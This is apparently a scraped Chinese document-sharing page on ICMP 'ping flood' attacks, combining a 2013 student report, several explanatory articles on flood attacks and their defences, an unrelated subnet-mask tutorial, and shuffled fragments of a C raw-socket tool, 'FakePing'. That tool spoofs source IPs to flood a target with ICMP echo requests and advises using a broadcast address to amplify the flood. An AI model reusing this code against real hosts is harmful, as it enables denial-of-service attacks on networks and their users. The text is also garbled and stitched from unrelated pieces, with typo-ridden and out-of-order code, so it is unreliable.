洪水Ping攻击代码

格式：docx
大小：14.87 KB
文档页数：7

下载文档原格式

ICMP洪水攻击

设计报告课程计算机网络 _ 设计名称 ICMP洪水攻击 _专业班级 ___同组人姓名 __ _ 同组人学号 _实验日期 2013年4月8日—2013年4月12日指导教师成绩2013 年 4 月 8 日一、设计目的和要求实验目的本次实验主要是利用原始套接字伪装IP地址来实现ICMP洪水攻击.让被攻击的主机接收到大量的ICMP包，造成被攻击的主机负载，从而达到攻击的目的。

实验要求编写程序并使得该程序可以在linux系统中成功运行，进而可以的对被攻击的主机造成影响。

二、设计说明（包括设计分析，系统运行环境，设计中的重点和难点）1.设计分析本实例的ICMP代码是简单的直接方法，建立多个线程向同一个主机发送ICMP 请求，而本地的IP地址是伪装的。

由于程序仅发送响应，不接收响应，容易造成目标主机的宕机。

ICMP Flood是一种在ping基础上形成的，但是用ping程序很少能造成目标机的问题。

这里边最大的问题是提高处理的速度。

伪装IP攻击：在直接攻击的基础上，将发生方的IP地址伪装，将直接IP攻击的缺点进行了改进。

2．系统运行环境虚拟机为：虚拟机Linux 系统3. 设计中的重点和难点:重点：建立多个线程向同一个主机发送ICMP请求，由于程序仅发送响应，不接收响应，造成目标主机的宕机。

难点：随机函数myrandom()，多线程函数DoS_fun()，ICMP头部打包函数DoS_icmp()，线程函数DoS_fun的创建和应用理解。

二、系统详细设计（包括程序流程、主要函数等）程序流程图1、随机函数myrandom随机函数主要为了生成一个不重复的并位于一定数值空间的值。

Srand（）函数用于初始化随即函数产生器，由于random（）函数式伪随机函数，是按照一定规律循环的，与srand（）函数有关，所以每次用不同的值进行初始化，这样产生的随即数就有了真正地随即性。

/*随机函数产生函数*由于系统的函数为伪随机函数*其与初始化有关，因此每次用不同的值进行初始化*/Static inline longmyrandom(int begin ,int end){Int qap=end-begin+1;Int ret=0;Srand((unsigned)time(0));Ret=random(emd)%gap+begin;Renturn ret;}2、多线程函数dos-fun（）本程序也是使用多线程进行协同工作，线程函数为dos-fun(),一直进行syn的链接。

icmp洪水攻击原理

icmp洪水攻击原理
icmp洪水攻击是一种常见的网络攻击方式，其原理是利用网络中的icmp协议发送大量的icmp数据包，使目标主机或网络设备因处理过多的icmp数据包而瘫痪或崩溃。

icmp协议是互联网控制消息协议的缩写，用于在ip网络中传递控制信息。

icmp数据包通常用于网络诊断和故障排除，如ping 命令就是利用icmp数据包来测试目标主机是否可达。

然而，当攻击者发送大量的icmp数据包，目标主机或网络设备就会因过度负荷而无法正常工作。

icmp洪水攻击通常分为两种类型：ping洪水攻击和icmp泛洪攻击。

ping洪水攻击是利用ping命令发送大量的icmp数据包，使目标主机因处理过多的请求而瘫痪。

icmp泛洪攻击则是利用特殊的工具向目标主机发送大量的icmp数据包，使其因处理过多的数据包而崩溃。

为了防止icmp洪水攻击，网络管理员可以采用各种手段来限制icmp数据包的发送和处理。

例如，可以设置防火墙规则来限制icmp 数据包的流量，或者在关键网络设备上启用icmp数据包过滤等措施。

同时，网络管理员也应该定期检查网络设备的安全状况，及时修补漏洞，防止攻击者利用icmp洪水攻击对网络造成危害。

- 1 -。

ping洪流攻击原理

ping洪流攻击原理Ping洪流攻击是一种网络攻击方式，在该攻击中，大量的Ping请求被发送到目标计算机或路由器，导致网络拥堵或崩溃。

本文将分步骤详细介绍Ping洪流攻击的原理和实施过程。

一、攻击原理Ping洪流攻击利用了Ping命令的工作原理。

Ping命令是一种网络工具，用于测试两台计算机之间的联机状况。

当发送一个Ping请求时，目标计算机或路由器会回传一个Ping响应，以表示该计算机或路由器已经收到了请求。

攻击者利用Ping命令发送大量的Ping请求到目标计算机或路由器，导致该计算机或路由器无法正常工作，从而达到攻击的目的。

二、实施过程1. 攻击者会首先寻找目标计算机或路由器的IP地址。

有时攻击者会使用扫描工具来搜索网络中的所有计算机或路由器，以寻找目标。

也有一些攻击者会尝试通过社交工程学手段获取目标计算机或路由器的IP地址。

2. 攻击者会使用一个Ping洪流工具来发送大量的Ping请求到目标计算机或路由器。

Ping洪流工具会自动发送Ping请求包，且每个请求包都会引发一个响应包。

攻击者可以指定要发送的Ping请求包的数量和发送速率。

3. 当目标计算机或路由器收到大量的Ping请求时，它们会尝试回复每个请求，导致网络拥堵。

由于网络设备在处理大量的请求时会耗尽计算资源，所以网络性能会急剧下降，甚至会导致网络崩溃。

4. 攻击者可能会重复上述攻击步骤多次，以进一步降低目标计算机或路由器的性能或瘫痪它们。

三、如何防范Ping洪流攻击？为了防范Ping洪流攻击，网络管理员可以采取以下几个措施：1. 限制网络中的Ping请求。

网络管理员可以配置路由器，使其只允许从特定IP地址发送Ping请求。

这样可以减少Ping洪流攻击对网络的影响。

2. 使用防火墙。

网络管理员可以配置防火墙，使其在检测到Ping洪流攻击时自动阻止恶意请求。

3. 更改Ping命令的默认设置。

网络管理员可以更改Ping命令的默认设置，以减少Ping洪流攻击的成功率。

synflood（SYN洪水攻击）-电脑资料

synflood（SYN洪水攻击）-电脑资料SYN Flood是当前最流行的DoS（拒绝服务攻击）与DdoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽（CPU满负荷或内存不足）的攻击方式，。

要明白这种攻击的基本原理，还是要从TCP连接建立的过程开始说起：大家都知道，TCP与UDP不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送TCP数据，必须先建立一个虚拟电路，也就是TCP连接，建立TCP连接的标准过程是这样的：首先，请求端（客户端）发送一个包含SYN标志的TCP报文，SYN即同步（Synchronize），同步报文会指明客户端使用的端口以及TCP连接的初始序号；第二步，服务器在收到客户端的SYN报文后，将返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加一，ACK即确认（Acknowledgment）。

第三步，客户端也返回一个确认报文ACK给服务器端，同样TCP 序列号被加一，到此一个TCP连接完成。

以上的连接过程在TCP协议中被称为三次握手（Three-way Handshake）。

问题就出在TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送SYN+ACK给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级（大约为30秒-2分钟）；一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接，即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试，电脑资料《syn flood(SYN洪水攻击)》(https://www.)。

IP洪水攻击

子网掩码快速算法
大家都应该知道2的0次方到10次方是多少把？也给大家说一下，分别是：
1 2 4 8 16 32 64 128 256 512 1024。
每个子网掩码= 256 - 你每个子网所需要的ip地址的数量
192= 256 - 64
192。168。1。0/255。255。255。0 每个子网所需要的ip地址的数量50+2=52
最后应用程序泛洪发生在OSI第七层，目的是消耗应用程序或系统资源，比较常见的应用程序泛洪是什么呢？没错，就是垃圾邮件，但一般无法产生严重的结果。其它类型的应用程序泛洪可能是在服务器上持续运行高CPU消耗的程序或者用持续不断的认证请求对服务器进行泛洪攻击，意思就是当TCP连接完成后，在服务器提示输入密码的时候停止响应。
对于大部分的攻击都能通过IDS来防御或日志分析来判断，可以检查相关的资料
参考资料：看书后原创哦！不是网络上抄袭来的
很简单,以C类网来说,用254 -子网掩码=主机数
比如说子网掩码为255.255.255.192
主机数为:254-192=62
192.168.1.0/255.255.255.192
192.168.1.64/255.255.255.192
192.168.1.128/255.255.255.192
192.168.1.192/255.255.255.192
192.168.1.0/255.255.255.224 192.168.1.1-30
192.168.1.96/255.255.255.224
192.168.1.96/255.255.255.224
如果你希望每个子网中只有5个ip地址可以给机器用，那么你就最少需要准备给每个子网7个ip地址，因为需要加上两头的不可用的网络和广播ip，所以你需要选比7多的最近的那位，也就是8，就是说选每个子网8个ip。好，到这一步，你就可以算掩码了，这个方法就是：最后的掩码= 256减去你每个子网所需要的ip地址的数量，那么这个例子就是256-8=248，那么算出这个，你就可以知道那些ip是不能用的了，看：0-7,8-15,16-23,24-31依此类推，写在上面的0、7、8、15、16、23、24、31（依此类推）都是不能用的，你应该用某两个数字之间的IP，那个就是一个子网可用的IP，怎么了？是不是不相信？太简单了。。。

ICMP攻击技术分析

ICMP攻击技术分析ICMP（Internet Control Message Protocol）是一种用于在网络中传递错误消息和操作状态信息的协议。

通常，ICMP用于进行网络故障诊断和错误报告。

但是，由于其设计的一些漏洞和不安全的实现方式，ICMP 也被用于执行攻击。

1. ICMP洪水攻击（ICMP Flood Attack）：攻击者向目标发送大量的ICMP回显请求（ping）消息，使目标设备无法处理所有的请求，从而导致网络堵塞或系统崩溃。

2. Smurf攻击：在Smurf攻击中，攻击者发送一个伪造的ICMP回显请求（ping）消息到广播地址，这个消息的源地址欺骗性地设置为目标的IP地址。

然后，所有收到这个消息的主机都会向目标发送一个回应，这样就会造成目标网络的短时间洪泛，导致带宽被大量消耗或系统崩溃。

3. Ping of Death攻击：在Ping of Death攻击中，攻击者向目标发送一个超过标准大小（65,535字节）的ICMP回显请求消息。

当目标设备尝试处理这个过大的请求时，会导致设备崩溃、重启或变得不可用。

4. ICMP地址掩盖攻击（ICMP Address Mask Spoofing Attack）：在这种攻击中，攻击者发送伪造的ICMP地址掩盖消息给目标主机。

通过使用伪造的源地址，攻击者可以掩盖自己的真实IP地址，从而隐藏自己的身份。

5. ICMP路由发现攻击（ICMP Router Discovery Attack）：攻击者发送ICMP路由发现请求消息到目标网络，然后假扮目标网络的路由器发送响应。

这种攻击可能导致目标主机的路由表被劫持，使其网络数据流量被重定向到攻击者的主机。

为了防御ICMP攻击，可以采取以下措施：1.过滤ICMP流量：部署网络防火墙或入侵检测系统（IDS）以过滤掉异常的ICMP流量，如大量的ICMP回显请求或过大的ICMP消息。

2.源地址验证：使用防火墙或路由器配置源地址验证机制，阻止伪造的ICMP消息进入网络。

flooding攻击是指

flooding攻击是指
洪水攻击是一种网络攻击，攻击者向目标系统发送大量的流量或请求，旨在使该系统的资源超负荷并导致其对合法用户不可用。

有几种类型的洪水攻击，包括：
1.网络洪水攻击：这种攻击方式涉及向网络或网络设备（如路由器或防火
墙）发送大量流量，试图使设备容量超负荷并导致其失效。

2.协议洪水攻击：这种攻击方式涉及向目标系统发送大量无效或格式错误
的请求，目的是破坏系统的正常运行。

3.应用程序洪水攻击：这种攻击方式涉及向特定应用程序或服务发送大量
请求，试图使应用程序的资源超负荷并导致其失效。

洪水攻击很难防御，因为它们通常涉及多个不同来源，并且很难追踪。

为了防御洪水攻击，重要的是实施强大的安全措施，如防火墙、入侵检测和预防系统以及负载平衡器，并定期监测网络流量以检测异常模式或流量骤增。

pingflood攻击原理

pingflood攻击原理概述pingflood攻击是一种常见的网络攻击方式，它利用ICMP协议中的ping命令来发送大量的请求给目标主机，从而导致目标主机的网络堵塞，无法正常工作。

本文将介绍pingflood攻击的原理及其影响，以及防御该攻击的方法。

一、pingflood攻击原理pingflood攻击是一种DoS（拒绝服务）攻击方法，攻击者通过向目标主机发送大量的ping请求来占用其带宽和系统资源，使其无法响应正常的网络请求。

ping命令是一种常用的网络诊断工具，用于测试网络连接和测量网络延迟。

它通过发送ICMP Echo Request 消息到目标主机，并等待目标主机返回ICMP Echo Reply消息来判断网络连通性。

而pingflood攻击利用了这一机制，但攻击者发送的ping请求数量极大，超过目标主机的处理能力，从而导致网络堵塞。

具体来说，pingflood攻击的原理如下：1. 攻击者通过特定的软件工具，向目标主机发送大量的ping请求。

2. 目标主机收到大量的ping请求后，会花费大量的系统资源进行处理。

3. 由于ping请求数量过大，目标主机的带宽和处理能力被耗尽，无法正常处理其他网络请求。

4. 目标主机的网络连接变得非常缓慢甚至完全中断，无法正常工作。

二、pingflood攻击的影响pingflood攻击对目标主机造成的影响主要包括以下几个方面：1. 带宽消耗：大量的ping请求会占用目标主机的带宽，导致网络连接变慢甚至中断。

2. 系统资源耗尽：目标主机需要处理大量的ping请求，消耗大量的CPU和内存资源，导致系统负载过高。

3. 网络服务中断：由于目标主机的带宽和系统资源被耗尽，无法正常处理其他网络请求，导致网络服务中断。

4. 数据丢失：pingflood攻击会导致目标主机无法正常接收和处理网络数据包，造成数据丢失。

三、防御pingflood攻击的方法为了防御pingflood攻击，保护网络的安全和稳定，可以采取以下几种方法：1. 防火墙设置：合理配置防火墙规则，限制对目标主机的ping请求。

防flood类攻击设置参数

防flood类攻击设置参数如何设置参数以防止flood类攻击一、什么是flood类攻击Flood类攻击是指攻击者通过发送大量请求或数据包来消耗目标系统的资源，从而使其无法正常工作。

这种攻击方式通常会导致目标系统的性能下降甚至崩溃，给系统的运行和用户的体验带来严重影响。

二、如何设置参数以防止flood类攻击为了有效应对flood类攻击，我们可以采取以下措施来设置参数：1. 限制并发连接数：通过设置系统的并发连接数上限，限制同时连接到系统的客户端数量。

这样可以防止攻击者通过大量的连接请求来消耗系统资源。

可以根据系统的承载能力和实际需求来灵活调整并发连接数的设置。

2. 设置请求频率限制：通过设置请求频率限制，限制同一IP地址或用户在单位时间内所发送的请求次数。

可以根据系统的处理能力和正常用户的行为特征来设置合理的请求频率限制。

这样可以有效防止攻击者通过发送大量请求来进行flood类攻击。

3. 验证用户身份：在系统中引入用户身份验证机制，要求用户在访问敏感资源之前进行身份验证。

这样可以有效防止未经身份验证的用户对系统进行恶意操作，从而降低flood类攻击的风险。

4. 使用验证码：在系统中引入验证码机制，要求用户在提交敏感操作之前完成验证码的输入。

这样可以有效防止机器人或自动化程序对系统进行flood类攻击。

5. 加强日志监控：建立完善的日志监控系统，实时监控系统的访问日志和异常日志。

及时发现异常访问行为，并采取相应的应对措施。

同时，可以通过分析日志数据，进行攻击来源的溯源，有助于进一步提升系统的安全性。

6. 使用防火墙和入侵检测系统：在系统的边界处设置防火墙，对入站和出站的网络流量进行监控和过滤。

同时，可以部署入侵检测系统，及时发现并阻止潜在的flood类攻击。

7. 合理配置系统资源：根据系统的实际需求和承载能力，合理配置系统的硬件资源和软件参数。

例如，对于Web服务器，可以调整并优化线程池、缓存和连接数等参数，以提高系统的抗flood类攻击能力。

icmp flood的实现的原理

ICMP flood 是一种网络攻击方式，通过发送大量的 ICMP 报文来占用目标主机的带宽和系统资源，从而导致其无法正常工作。

这种攻击方式通常被用于拒绝服务（DoS）攻击，以使网络中的服务器或路由器无法响应合法的请求。

在本文中，我们将详细介绍ICMP flood 攻击的实现原理和防御方法。

一、ICMP 协议简介ICMP（Internet Control Message Protocol）是 TCP/IP 协议族中的一个重要协议，它主要用于网络设备之间的交互。

每个ICMP 报文都包含一个类型码和一个代码，用于描述报文的具体内容。

下面是一些常见的 ICMP 报文类型：1. Echo Request（类型为 8）：也称为 Ping 请求，用于测试网络连通性。

2. Echo Reply（类型为0）：也称为Ping 响应，用于回复Ping 请求。

3. Destination Unreachable（类型为 3）：表示目标主机不可达。

4. Time Exceeded（类型为 11）：表示数据包在传输过程中超时。

二、ICMP flood 攻击原理ICMP flood 攻击利用了 ICMP 协议的 Echo Request 和 Echo Reply 报文。

攻击者向目标主机不断发送大量的ICMP Echo Request 报文，从而造成目标主机的系统负荷过大，无法正常工作。

下面是ICMP flood 攻击的实现过程：1. 攻击者向目标主机发送大量的 ICMP Echo Request 报文。

2. 目标主机接收到 ICMP Echo Request 报文后，会回复一个ICMP Echo Reply 报文。

3. 攻击者忽略 ICMP Echo Reply 报文，继续向目标主机发送ICMP Echo Request 报文，使其陷入循环处理。

4. 随着 ICMP Echo Request 报文的不断增加，目标主机的带宽和系统资源被占用，从而导致其无法正常工作。

1、下载文档前请自行甄别文档内容的完整性，平台不提供额外的编辑、内容补充、找答案等附加服务。
2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
3、如文档侵犯您的权益，请联系客服反馈,我们会尽快为您处理(人工客服工作时间：9:00-18:30)。

}IP_HEADER;
//
//定义ICMP首部
typedef struct _ihdr
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和
USHORT i_id; //识别号（一般用进程号作为识别号）
USHORT i_seq; //报文序列号
printf(\"Set IP_HDRINCL Error!\\n\");
__try{
//设置发送超时
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut)); if (ErrorCode==SOCKET_ERROR)
ExitProcess(STATUS_FAILED);
} if((SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_
OVERLAPPED))==INVALID_SOCKET)
{
fprintf(stderr,\"WSASocket() failed: %d\\n\",WSAGetLastError());
ExitProcess(STATUS_;
}
flag=TRUE;
//设置IP_HDRINCL以自己填充IP首部
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#define SEQ 0x28376839
#define STATUS_FAILED 0xFFFF //错误返回值
typedef struct _iphdr //定义IP首部
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header), 'E', PacketSize);
memset(SendBuf+sizeof(ip_header)+sizeof(icmp_header)+PacketSize, 0, 1);
//计算发送缓冲区的大小
int main(int argc, char **argv)
{
int datasize,ErrorCode,counter,flag;
int TimeOut=2000, SendSEQ=0, PacketSize=32;
char SendBuf[65535]={0};
WSADATA wsaData;
printf(\"\\tCtrl+C to Quit\\n\");
//初始化SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0)
{
fprintf(stderr,\"WSAStartup failed: %d\\n\",ErrorCode);
printf(\"\\tFakePing.exe 192.168.15.23 192.168.15.200 6400\\n\");
exit(0);
}
strcpy(FakeSourceIp,argv[1]);
strcpy(DestIp,argv[2]);
if (argc>3) PacketSize=atoi(argv[3]);
{
fprintf(stderr,\"Failed to set send TimeOut: %d\\n\",WSAGetLastError());
__leave;
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(DestIp);
ip_header.sourceIP=inet_addr(FakeSourceIp);//32位源IP地址
ip_header.destIP=inet_addr(DestIp);//32位目的IP地址
//填充ICMP首部
icmp_header.i_type = 8;
icmp_header.i_code = 0;
ip_header.ident=1;//16位标识
ip_header.frag_and_flags=0;//3位标志位
ip_header.ttl=128;//8位生存时间TTL
ip_header.proto=IPPROTO_ICMP;//8位协议(TCP, UDP或其他)
ip_header.checksum=0;//16位IP首部校验和
ULONG timestamp; //时间戳
}ICMP_HEADER;
//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
WSACleanup();
}
return 0;
}
icmp_header.i_cksum = 0;
icmp_header.i_id = 2;
icmp_header.timestamp = 999;
icmp_header.i_seq=999;
memcpy(SendBuf, &icmp_header, sizeof(icmp_header));
memset(SendBuf+sizeof(icmp_header), 'E', PacketSize);
printf(\"Email:\\n\");
printf(\"\\tShotgun@\\n\");
printf(\"HomePage:\\n\");
printf(\"\\t\\n\");
printf(\"\\t\\n\");
if (PacketSize>60000)
{
printf(\"Error! Packet size too big, must <60K\\n\");
exit(0);
}
printf(\"Now Fake %sPing %susing Packet size=%d bytes\\n\",
FakeSourceIp, DestIp, PacketSize);
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
ICMP_HEADER icmp_header;
char FakeSourceIp[20],DestIp[20];
//接受命令行参数
if (argc<3)
unsigned charttl; //8位生存时间TTL
unsigned char proto; //8位协议(TCP, UDP或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
datasize=sizeof(ip_header)+sizeof(icmp_header)+PacketSize;
ip_header.checksum=checksum((USHORT *)SendBuf,datasize);
//填充发送缓冲区
memcpy(SendBuf,&ip_header, sizeof(ip_header));
{
printf(\"FakePing by Shotgun\\n\");
printf(\"\\tThis program can do Ping-Flooding from a FakeIP\\n\");
printf(\"\\tUsing a BroadCast IP as the FakeIP will enhance the effect\\n\");
while(1)
{
Sleep(100);
printf(\".\");
for(counter=0;counter<1024;counter++)
{
//发送ICMP报文
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(structsockaddr*)&DestAddr,sizeof(DestAddr));
//填充IP首部
ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号，低四位首部长度